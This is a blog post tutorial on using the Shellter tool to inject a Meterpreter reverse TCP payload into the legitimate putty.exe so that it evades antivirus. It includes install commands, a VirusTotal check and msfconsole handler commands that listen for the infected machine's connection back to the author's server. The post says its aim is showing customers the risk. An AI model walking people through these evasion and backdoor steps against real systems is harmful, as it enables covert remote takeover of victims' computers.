top of page

CYBER & INFOSEC

"blogger, InfoSec specialist, super hero ... and all round good guy" 

DISCUSSIONS, CONCEPTS & TECHNOLOGIES FOR THE WORLD OF

JOIN THE DISCUSSION

Shellter Project – bypassing AV Detection

Shellter is a shellcode injector and can be found at:www.shellterproject.com I have been using the tool to demonstrate to customers how simple it is to bypass antivirus (AV) detection using programs that would have otherwise been detected as suspicious or possible threats within typical AV analysis engines. The Good Shellter is a dynamic program executable (or PE) infector. The positive aspects of it, according to Shellter’s project page, are as follows:


Compatible with Windows x86/x64 (XP SP3 and above) plus Wine/CrossOver for Linux/Mac.


  • Portable – no setup is required.

  • Doesn’t require extra dependencies or other programming languages such as Python, .net, etc.

  • No static program executable templates, framework wrappers, etc.

  • Supports any 32-bit payload which can be generated either by Metasploit or user customized payloads.

  • Compatible with all types of encoding by Metasploit.

  • Compatible with custom encoding created by the user.

  • Stealth Mode.

  • Multi-payload PE infection.

  • Proprietary encoding plus user defined encoding sequence.

  • Dynamic thread context keys.

  • Supports reflective dynamic Link-library (DLL) loaders.

  • Junk code polymorphic engine.

  • Thread context aware polymorphic engine.

  • User can use custom polymorphic code of his own.

  • Takes advantage of Dynamic Thread Context information for anti-static analysis.

  • Detects self-modifying code.

  • Traces single and multi-thread applications.

  • Fully dynamic injection locations based on the execution flow.

  • Disassembles and shows to the user available injection points.

  • User chooses what to inject, when, and where.

  • Command Line support.

  • And most important…it is free


The Bad

Of course, there are some negatives. The list doesn’t seem nearly as long, but mind you, this is from their Web site. Their ball, their rules…


  • Doesn’t (currently) support 64-bit PE files and payloads.

  • Free, but not open source, ergo…

  • One developer.


The Install:


To install Shellter on Kali Linux use the following commands:


apt-get update

apt-get install shellter

You may also need install wine32 (Figure 21). You can do so by typing the following command (as root) on Kali:


dpkg --add-architecture i386 && apt-get update &&apt-get install wine32


Next, we are going to take a legitimate program, like putty.exe, and use it for our test bed. In reality we could literally use any legitimate Windows executable.


You can easily use some slightly more advanced techniques to embed similar types of attacks in other types of files.


For now let’s simply stick with Windows program executables for this example.


As you can see in the screen shot, the legitimate executable is transferred into our directory in Kali. When you play with Shellter, you will want to ensure your carrier or legitimate executable is in same directory when you run Shellter. Now we will run Shellter.

For the sake of simplicity and expediency, we will keep to the basics for now. Follow these steps: Let’s select Auto for mode (Figure 24. We will also specify the legitimate program. Shellter will actually create a backup the legitimate executable program and modify it.

The code will be modified at this point. Shellter will give us the option to use an available payload, or we can also create a custom one. We are going to choose reverse TCP which is an existing list option.

NOTE: If you need the legitimate executable program intact after this, it is probably best to create a backup on a separate storage device prior to doing this. You will be asked to further define some other options:LHOST This will be the IP address or DNS name the victim machine will use to connect back to the command and control server. The server has to be reachable by the victim. LPORT This will be the port used to listen in on the victim from the command and control server. In our example we used port 443.

Congratulations - at this point you have created a new malicious program (Figure 27) that will most likely go undetected by most antivirus programs.

If you get a verified message (see below) you are basically good to go.

If you check your directory, you will see that putty.exe has been modified, and Shellter created a backup of the original executable. We will now use the md5sum or upload the file directly command and check it against VirusTotal.


We see only seven security vendors are able to detect the new attack created by Shellter. These seven AV vendors are doing a great job in detecting against the attack.

Only seven vendors detect this a malicious (remember red is good, it means these are the vendors that are detecting the attack).


We start our listening server in msfconsole on Kali Linux using the following commands:


mfsconsole

use exploit/multi/handler

set LHOST 192.168.81.175

set LPORT 443

set PAYLOAD windows/meterpreter/reverse_tcp

show options

exploit


Now we will go to our victim machine where we have transferred the exploited modified version of our executable. We should have been able to bypass most antivirus systems at this point. We will launch our exploited program which will connect back to our command and control server.


In Conclusion In future blogs we will explore more along the lines of this topic, and go into some additional details of specific types of evasion attacks and processes. We’ll use those to explore wider ranges of AV evasion techniques. This knowledge can be used for good or bad, just as any security knowledge can. I hope you use this to explore the ways cybercriminals try to continue exploiting systems for financial gain through theft and fraud. Our job, as always, is to understand their methods and thwart criminal behavior. Stay tuned, and fight the good fight!

Comments


Commenting has been turned off.
bottom of page